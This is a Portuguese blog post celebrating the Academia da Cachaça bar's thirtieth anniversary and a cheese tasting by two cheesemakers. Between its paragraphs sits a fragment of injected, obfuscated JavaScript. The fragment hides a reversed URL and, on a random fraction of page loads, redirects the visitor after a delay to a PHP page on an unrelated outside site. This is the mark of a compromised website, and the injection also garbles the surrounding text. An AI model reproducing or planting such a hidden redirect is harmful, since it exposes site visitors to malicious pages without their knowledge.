Academia da Cachaça, por trinta anos uma celebração à amizade!

Posted by 5 de agosto de 2015 Queijos No Comments
5

Sentar em uma mesa de bar com um grupo de amigos, uma cerveja, uma cachaça, um brinde é uma das melhores sensações que eu conheço, principalmente quando se tem um motivo para comemorar.
E quando quem está comemorando é o próprio bar?
Ontem em mais uma comemoração pelos seus trinta anos a Academia da Cachaça arrasou! Foi uma festa maravilhosa.
E quem veio para esta comemoração foi Guilherme Ferreira e Diego Martins, vieram mostrar seus queijos e prosear um pouco com a gente.

) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}top” bg_repeat=”no-repeat” text_color=”dark” text_align=”left”]

A amizade entre Diego e Guilherme não é antiga. Eles se conheceram recentemente em eventos queijeiros e se reconheceram em suas lutas diárias. É bonito ver a alegria, a empolgação, a garra e energia que alimenta esta amizade.
Amizade rara, destas que começam no trabalho e que se esbaldam na alegria. Trocar conselhos, cuidar do porre do outro, se alegrar com a vitória do amigo. Quando aparece uma chance para falar de queijo, então, melhor ainda, é juntar as histórias numa só.

Ontem foi mais um dia de celebração à amizade, amigos de toda parte brindando.
Entre cachaças e queijos a grande estrela da noite foi a amizade.

Tim tim… um brinde aos grandes amigos, aos que chegaram, aos antigos, aos que estiveram presentes e aos que por algum motivo, não puderam comparecer, mas tenho certeza estiveram presentes com boas vibrações.